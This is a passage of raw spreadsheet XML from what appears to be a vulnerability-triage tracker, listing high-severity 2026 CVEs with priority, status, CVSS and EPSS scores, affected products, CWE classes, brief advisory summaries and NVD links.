t="inlineStr"><is><t>HIGH</t></is></c><c r="F530" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G530" s="5" t="inlineStr" /><c r="H530" s="5" t="n"><v>0.007</v></c><c r="I530" s="5" t="inlineStr" /><c r="J530" s="5" t="inlineStr" /><c r="K530" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L530" s="5" t="inlineStr" /><c r="M530" s="5" t="inlineStr" /><c r="N530" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O530" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P530" s="5" t="inlineStr" /><c r="Q530" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R530" s="5" t="inlineStr"><is><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is></c><c r="S530" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-74239</t></is></c></row><row r="531"><c r="A531" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B531" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C531" s="5" t="inlineStr"><is><t>CVE-2026-75121</t></is></c><c r="D531" s="5" t="n"><v>8.6</v></c><c r="E531" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F531" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G531" s="5" t="inlineStr" /><c r="H531" s="5" t="n"><v>0.011</v></c><c r="I531" s="5" t="inlineStr" /><c r="J531" s="5" t="inlineStr" /><c r="K531" s="5" t="inlineStr" /><c r="L531" s="5" t="inlineStr" /><c r="M531" s="5" t="inlineStr" /><c r="N531" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O531" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P531" s="5" t="inlineStr" /><c r="Q531" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="R531" s="5" t="inlineStr"><is><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is></c><c r="S531" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75121</t></is></c></row><row r="532"><c r="A532" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B532" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C532" s="5" t="inlineStr"><is><t>CVE-2026-75122</t></is></c><c r="D532" s="5" t="n"><v>8.6</v></c><c r="E532" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F532" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G532" s="5" t="inlineStr" /><c r="H532" s="5" t="n"><v>0.008</v></c><c r="I532" s="5" t="inlineStr" /><c r="J532" s="5" t="inlineStr" /><c r="K532" s="5" t="inlineStr" /><c r="L532" s="5" t="inlineStr" /><c r="M532" s="5" t="inlineStr" /><c r="N532" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O532" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P532" s="5" t="inlineStr" /><c r="Q532" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="R532" s="5" t="inlineStr"><is><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is></c><c r="S532" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75122</t></is></c></row><row r="533"><c r="A533" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B533" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C533" s="5" t="inlineStr"><is><t>CVE-2026-75123</t></is></c><c r="D533" s="5" t="n"><v>8.6</v></c><c r="E533" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F533" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G533" s="5" t="inlineStr" /><c r="H533" s="5" t="n"><v>0.011</v></c><c r="I533" s="5" t="inlineStr" /><c r="J533" s="5" t="inlineStr" /><c r="K533" s="5" t="inlineStr" /><c r="L533" s="5" t="inlineStr" /><c r="M533" s="5" t="inlineStr" /><c r="N533" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O533" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P533" s="5" t="inlineStr" /><c r="Q533" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="R533" s="5" t="inlineStr"><is><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is></c><c r="S533" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75123</t></is></c></row><row r="534"><c r="A534" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B534" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C534" s="5" t="inlineStr"><is><t>CVE-2026-75990</t></is></c><c r="D534" s="5" t="n"><v>8.6</v></c><c r="E534" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F534" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G534" s="5" t="inlineStr" /><c r="H534" s="5" t="n"><v>0.002</v></c><c r="I534" s="5" t="inlineStr" /><c r="J534" s="5" t="inlineStr" /><c r="K534" s="5" t="inlineStr" /><c r="L534" s="5" t="inlineStr" /><c r="M534" s="5" t="inlineStr" /><c r="N534" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O534" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P534" s="5" t="inlineStr" /><c r="Q534" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R534" s="5" t="inlineStr"><is><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S534" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75990</t></is></c></row><row r="535"><c r="A535" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B535" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C535" s="5" t="inlineStr"><is><t>CVE-2026-75991</t></is></c><c r="D535" s="5" t="n"><v>8.6</v></c><c r="E535" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F535" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G535" s="5" t="inlineStr" /><c r="H535" s="5" t="n"><v>0.002</v></c><c r="I535" s="5" t="inlineStr" /><c r="J535" s="5" t="inlineStr" /><c r="K535" s="5" t="inlineStr" /><c r="L535" s="5" t="inlineStr" /><c r="M535" s="5" t="inlineStr" /><c r="N535" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O535" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P535" s="5" t="inlineStr" /><c r="Q535" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="R535" s="5" t="inlineStr"><is><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S535" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75991</t></is></c></row><row r="536"><c r="A536" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B536" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C536" s="5" t="inlineStr"><is><t>CVE-2026-76190</t></is></c><c r="D536" s="5" t="n"><v>8.6</v></c><c r="E536" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F536" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G536" s="5" t="inlineStr" /><c r="H536" s="5" t="n"><v>0.01</v></c><c r="I536" s="5" t="inlineStr" /><c r="J536" s="5" t="inlineStr" /><c r="K536" s="5" t="inlineStr" /><c r="L536" s="5" t="inlineStr" /><c r="M536" s="5" t="inlineStr" /><c r="N536" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O536" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P536" s="5" t="inlineStr" /><c r="Q536" s="5" t="inlineStr"><is><t>CWE-95</t></is></c><c r="R536" s="5" t="inlineStr"><is><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is></c><c r="S536" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76190</t></is></c></row><row r="537"><c r="A537" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B537" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C537" s="5" t="inlineStr"><is><t>CVE-2026-76199</t></is></c><c r="D537" s="5" t="n"><v>8.6</v></c><c r="E537" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F537" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G537" s="5" t="inlineStr" /><c r="H537" s="5" t="n"><v>0.002</v></c><c r="I537" s="5" t="inlineStr" /><c r="J537" s="5" t="inlineStr" /><c r="K537" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L537" s="5" t="inlineStr" /><c r="M537" s="5" t="inlineStr" /><c r="N537" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O537" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P537" s="5" t="inlineStr" /><c r="Q537" s="5" t="inlineStr"><is><t>CWE-427</t></is></c><c r="R537" s="5" t="inlineStr"><is><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is></c><c r="S537" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76199</t></is></c></row><row r="538"><c r="A538" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B538" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C538" s="5" t="inlineStr"><is><t>CVE-2026-77109</t></is></c><c r="D538" s="5" t="n"><v>8.6</v></c><c r="E538" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F538" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G538" s="5" t="inlineStr" /><c r="H538" s="5" t="n"><v>0.004</v></c><c r="I538" s="5" t="inlineStr" /><c r="J538" s="5" t="inlineStr" /><c r="K538" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L538" s="5" t="inlineStr" /><c r="M538" s="5" t="inlineStr" /><c r="N538" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O538" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P538" s="5" t="inlineStr" /><c r="Q538" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R538" s="5" t="inlineStr"><is><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is></c><c r="S538" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77109</t></is></c></row><row r="539"><c r="A539" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B539" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C539" s="5" t="inlineStr"><is><t>CVE-2026-77774</t></is></c><c r="D539" s="5" t="n"><v>8.6</v></c><c r="E539" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F539" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G539" s="5" t="inlineStr" /><c r="H539" s="5" t="n"><v>0.005</v></c><c r="I539" s="5" t="inlineStr" /><c r="J539" s="5" t="inlineStr" /><c r="K539" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L539" s="5" t="inlineStr" /><c r="M539" s="5" t="inlineStr" /><c r="N539" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O539" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P539" s="5" t="inlineStr" /><c r="Q539" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R539" s="5" t="inlineStr"><is><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is></c><c r="S539" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77774</t></is></c></row><row r="540"><c r="A540" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B540" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C540" s="5" t="inlineStr"><is><t>CVE-2026-78675</t></is></c><c r="D540" s="5" t="n"><v>8.6</v></c><c r="E540" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F540" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G540" s="5" t="inlineStr" /><c r="H540" s="5" t="n"><v>0.001</v></c><c r="I540" s="5" t="inlineStr" /><c r="J540" s="5" t="inlineStr" /><c r="K540" s="5" t="inlineStr" /><c r="L540" s="5" t="inlineStr"><is><t>pip:GitPython</t></is></c><c r="M540" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N540" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O540" s="5" t="inlineStr" /><c r="P540" s="5" t="inlineStr" /><c r="Q540" s="5" t="inlineStr"><is><t>CWE-73, CWE-200</t></is></c><c r="R540"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S540" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78675</t></is></c></row><row r="541"><c r="A541" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B541" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C541" s="5" t="inlineStr"><is><t>CVE-2026-79721</t></is></c><c r="D541" s="5" t="n"><v>8.6</v></c><c r="E541" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F541" s="5" t="inlineStr"><is><t>6f8de1f0-f67e-45a6-b68f-98777fdb759c</t></is></c><c r="G541" s="5" t="inlineStr" /><c r="H541" s="5" t="n"><v>0.003</v></c><c r="I541" s="5" t="inlineStr" /><c r="J541" s="5" t="inlineStr" /><c r="K541" s="5" t="inlineStr" /><c r="L541" s="5" t="inlineStr" /><c r="M541" s="5" t="inlineStr" /><c r="N541" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O541" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P541" s="5" t="inlineStr" /><c r="Q541" s="5" t="inlineStr"><is><t>CWE-829</t></is></c><c r="R541" s="5" t="inlineStr"><is><t>Code execution can occur in versions of the MLflow platform running version 0.0.1 or newer, enabling a maliciously crafted model artifact to execute arbitrary code on an end user's system when loaded by the project.</t></is></c><c r="S541" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79721</t></is></c></row><row r="542"><c r="A542" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B542" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C542" s="5" t="inlineStr"><is><t>CVE-2026-80097</t></is></c><c r="D542" s="5" t="n"><v>8.6</v></c><c r="E542" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F542" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G542" s="5" t="inlineStr" /><c r="H542" s="5" t="n"><v>0.004</v></c><c r="I542" s="5" t="inlineStr" /><c r="J542" s="5" t="inlineStr" /><c r="K542" s="5" t="inlineStr" /><c r="L542" s="5" t="inlineStr" /><c r="M542" s="5" t="inlineStr" /><c r="N542" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O542" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P542" s="5" t="inlineStr" /><c r="Q542" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="R542" s="5" t="inlineStr"><is><t>Improper authentication in Microsoft Authenticator allows an unauthorized attacker to elevate privileges locally.</t></is></c><c r="S542" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80097</t></is></c></row><row r="543"><c r="A543" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B543" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C543" s="5" t="inlineStr"><is><t>CVE-2026-81525</t></is></c><c r="D543" s="5" t="n"><v>8.6</v></c><c r="E543" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F543" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G543" s="5" t="inlineStr" /><c r="H543" s="5" t="n"><v>0.003</v></c><c r="I543" s="5" t="inlineStr" /><c r="J543" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K543" s="5" t="inlineStr" /><c r="L543" s="5" t="inlineStr"><is><t>composer:mongodb/mongodb</t></is></c><c r="M543" s="5" t="inlineStr"><is><t>1.21.4, 2.4.1</t></is></c><c r="N543" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O543" s="5" t="inlineStr" /><c r="P543" s="5" t="inlineStr" /><c r="Q543" s="5" t="inlineStr"><is><t>CWE-943</t></is></c><c r="R543" s="5" t="inlineStr"><is><t>### Impact
Passing untrusted input as part of a database or collection name may result in targeting a different database or collection than specified.

### Patches
Fixed in PHP library 1.21.4 and 2.4.1.

### Workarounds
Validate database and collection names prior to passing into APIs.</t></is></c><c r="S543" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81525</t></is></c></row><row r="544"><c r="A544" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B544" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C544" s="5" t="inlineStr"><is><t>CVE-2026-82304</t></is></c><c r="D544" s="5" t="n"><v>8.6</v></c><c r="E544" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F544" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G544" s="5" t="inlineStr" /><c r="H544" s="5" t="n"><v>0.003</v></c><c r="I544" s="5" t="inlineStr" /><c r="J544" s="5" t="inlineStr" /><c r="K544" s="5" t="inlineStr" /><c r="L544" s="5" t="inlineStr" /><c r="M544" s="5" t="inlineStr" /><c r="N544" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O544" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P544" s="5" t="inlineStr" /><c r="Q544" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="R544" s="5" t="inlineStr"><is><t>The Music Store  WordPress plugin before 1.4.5 does not sanitise and escape user input before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.</t></is></c><c r="S544" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82304</t></is></c></row><row r="545"><c r="A545" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B545" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C545" s="5" t="inlineStr"><is><t>CVE-2026-82684</t></is></c><c r="D545" s="5" t="n"><v>8.6</v></c><c r="E545" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F545" s="5" t="inlineStr"><is><t>ics-cert@hq.dhs.gov</t></is></c><c r="G545" s="5" t="inlineStr" /><c r="H545" s="5" t="n"><v>0.005</v></c><c r="I545" s="5" t="inlineStr" /><c r="J545" s="5" t="inlineStr" /><c r="K545" s="5" t="inlineStr" /><c r="L545" s="5" t="inlineStr" /><c r="M545" s="5" t="inlineStr" /><c r="N545" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O545" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P545" s="5" t="inlineStr" /><c r="Q545" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R545" s="5" t="inlineStr"><is><t>Tycon Systems TPDIN-Monitor-WEB3 versions 2.2.9 and prior are vulnerable to a Missing Authorization vulnerability. This could allow an attacker to extract system credentials, configurations, or flash contents.</t></is></c><c r="S545" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82684</t></is></c></row><row r="546"><c r="A546" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B546" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C546" s="5" t="inlineStr"><is><t>CVE-2026-82712</t></is></c><c r="D546" s="5" t="n"><v>8.6</v></c><c r="E546" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F546" s="5" t="inlineStr"><is><t>ics-cert@hq.dhs.gov</t></is></c><c r="G546" s="5" t="inlineStr" /><c r="H546" s="5" t="n"><v>0.002</v></c><c r="I546" s="5" t="inlineStr" /><c r="J546" s="5" t="inlineStr" /><c r="K546" s="5" t="inlineStr" /><c r="L546" s="5" t="inlineStr" /><c r="M546" s="5" t="inlineStr" /><c r="N546" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O546" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P546" s="5" t="inlineStr" /><c r="Q546" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="R546" s="5" t="inlineStr"><is><t>Tycon Systems TPDIN-Monitor-WEB3 versions 2.2.9 and prior are vulnerable to a cross-site request forgery vulnerability. This could allow an attacker to perform state changing operations on the device.</t></is></c><c r="S546" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82712</t></is></c></row><row r="547"><c r="A547" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B547" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C547" s="5" t="inlineStr"><is><t>CVE-2026-84194</t></is></c><c r="D547" s="5" t="n"><v>8.6</v></c><c r="E547" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F547" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G547" s="5" t="inlineStr" /><c r="H547" s="5" t="n"><v>0.014</v></c><c r="I547" s="5" t="inlineStr" /><c r="J547" s="5" t="inlineStr" /><c r="K547" s="5" t="inlineStr" /><c r="L547" s="5" t="inlineStr" /><c r="M547" s="5" t="inlineStr" /><c r="N547" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O547" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P547" s="5" t="inlineStr" /><c r="Q547" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="R547" s="5" t="inlineStr"><is><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is></c><c r="S547" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84194</t></is></c></row><row r="548"><c r="A548" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B548" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C548" s="5" t="inlineStr"><is><t>CVE-2026-84203</t></is></c><c r="D548" s="5" t="n"><v>8.6</v></c><c r="E548" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F548" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G548" s="5" t="inlineStr" /><c r="H548" s="5" t="n"><v>0.003</v></c><c r="I548" s="5" t="inlineStr" /><c r="J548" s="5" t="inlineStr" /><c r="K548" s="5" t="inlineStr" /><c r="L548" s="5" t="inlineStr" /><c r="M548" s="5" t="inlineStr" /><c r="N548" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O548" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P548" s="5" t="inlineStr" /><c r="Q548" s="5" t="inlineStr"><is><t>CWE-613</t></is></c><c r="R548" s="5" t="inlineStr"><is><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is></c><c r="S548" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84203</t></is></c></row><row r="549"><c r="A549" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B549" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C549" s="5" t="inlineStr"><is><t>CVE-2026-84452</t></is></c><c r="D549" s="5" t="n"><v>8.6</v></c><c r="E549" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F549" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G549" s="5" t="inlineStr" /><c r="H549" s="5" t="n"><v>0.008999999999999999</v></c><c r="I549" s="5" t="inlineStr" /><c r="J549" s="5" t="inlineStr" /><c r="K549" s="5" t="inlineStr" /><c r="L549" s="5" t="inlineStr"><is><t>pip:winml-cli</t></is></c><c r="M549" s="5" t="inlineStr"><is><t>0.4.0</t></is></c><c r="N549" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O549" s="5" t="inlineStr" /><c r="P549" s="5" t="inlineStr" /><c r="Q549" s="5" t="inlineStr"><is><t>CWE-306, CWE-942</t></is></c><c r="R549"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S549" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84452</t></is></c></row><row r="550"><c r="A550" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B550" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C550" s="5" t="inlineStr"><is><t>CVE-2026-85388</t></is></c><c r="D550" s="5" t="n"><v>8.6</v></c><c r="E550" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F550" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G550" s="5" t="inlineStr" /><c r="H550" s="5" t="n"><v>0.003</v></c><c r="I550" s="5" t="inlineStr" /><c r="J550" s="5" t="inlineStr"><is><t>postgresql</t></is></c><c r="K550" s="5" t="inlineStr" /><c r="L550" s="5" t="inlineStr" /><c r="M550" s="5" t="inlineStr" /><c r="N550" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O550" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P550" s="5" t="inlineStr" /><c r="Q550" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="R550" s="5" t="inlineStr"><is><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is></c><c r="S550" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85388</t></is></c></row><row r="551"><c r="A551" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B551" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C551" s="5" t="inlineStr"><is><t>CVE-2026-86167</t></is></c><c r="D551" s="5" t="n"><v>8.6</v></c><c r="E551" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F551" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G551" s="5" t="inlineStr" /><c r="H551" s="5" t="n"><v>0.016</v></c><c r="I551" s="5" t="inlineStr" /><c r="J551" s="5" t="inlineStr" /><c r="K551" s="5" t="inlineStr" /><c r="L551" s="5" t="inlineStr" /><c r="M551" s="5" t="inlineStr" /><c r="N551" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O551" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P551" s="5" t="inlineStr" /><c r="Q551" s="5" t="inlineStr"><is><t>CWE-77, CWE-78</t></is></c><c r="R551" s="5" t="inlineStr"><is><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is></c><c r="S551" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86167</t></is></c></row><row r="552"><c r="A552" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B552" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C552" s="5" t="inlineStr"><is><t>CVE-2026-86185</t></is></c><c r="D552" s="5" t="n"><v>8.6</v></c><c r="E552" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F552" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G552" s="5" t="inlineStr" /><c r="H552" s="5" t="n"><v>0.001</v></c><c r="I552" s="5" t="inlineStr" /><c r="J552" s="5" t="inlineStr" /><c r="K552" s="5" t="inlineStr" /><c r="L552" s="5" t="inlineStr" /><c r="M552" s="5" t="inlineStr" /><c r="N552" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O552" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P552" s="5" t="inlineStr" /><c r="Q552" s="5" t="inlineStr"><is><t>CWE-295</t></is></c><c r="R552" s="5" t="inlineStr"><is><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is></c><c r="S552" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86185</t></is></c></row><row r="553"><c r="A553" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B553" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C553" s="5" t="inlineStr"><is><t>CVE-2026-86509</t></is></c><c r="D553" s="5" t="n"><v>8.6</v></c><c r="E553" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F553" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G553" s="5" t="inlineStr" /><c r="H553" s="5" t="n"><v>0.004</v></c><c r="I553" s="5" t="inlineStr" /><c r="J553" s="5" t="inlineStr" /><c r="K553" s="5" t="inlineStr" /><c r="L553" s="5" t="inlineStr" /><c r="M553" s="5" t="inlineStr" /><c r="N553" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O553" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P553" s="5" t="inlineStr" /><c r="Q553" s="5" t="inlineStr"><is><t>CWE-119, CWE-121</t></is></c><c r="R553" s="5" t="inlineStr"><is><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is></c><c r="S553" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86509</t></is></c></row><row r="554"><c r="A554" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B554" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C554" s="5" t="inlineStr"><is><t>CVE-2026-86510</t></is></c><c r="D554" s="5" t="n"><v>8.6</v></c><c r="E554" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F554" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G554" s="5" t="inlineStr" /><c r="H554" s="5" t="n"><v>0.005</v></c><c r="I554" s="5" t="inlineStr" /><c r="J554" s="5" t="inlineStr" /><c r="K554" s="5" t="inlineStr" /><c r="L554" s="5" t="inlineStr" /><c r="M554" s="5" t="inlineStr" /><c r="N554" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O554" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P554" s="5" t="inlineStr" /><c r="Q554" s="5" t="inlineStr"><is><t>CWE-119, CWE-787</t></is></c><c r="R554" s="5" t="inlineStr"><is><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is></c><c r="S554" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86510</t></is></c></row><row r="555"><c r="A555" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B555" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C555" s="5" t="inlineStr"><is><t>CVE-2026-86712</t></is></c><c r="D555" s="5" t="n"><v>8.6</v></c><c r="E555" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F555" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G555" 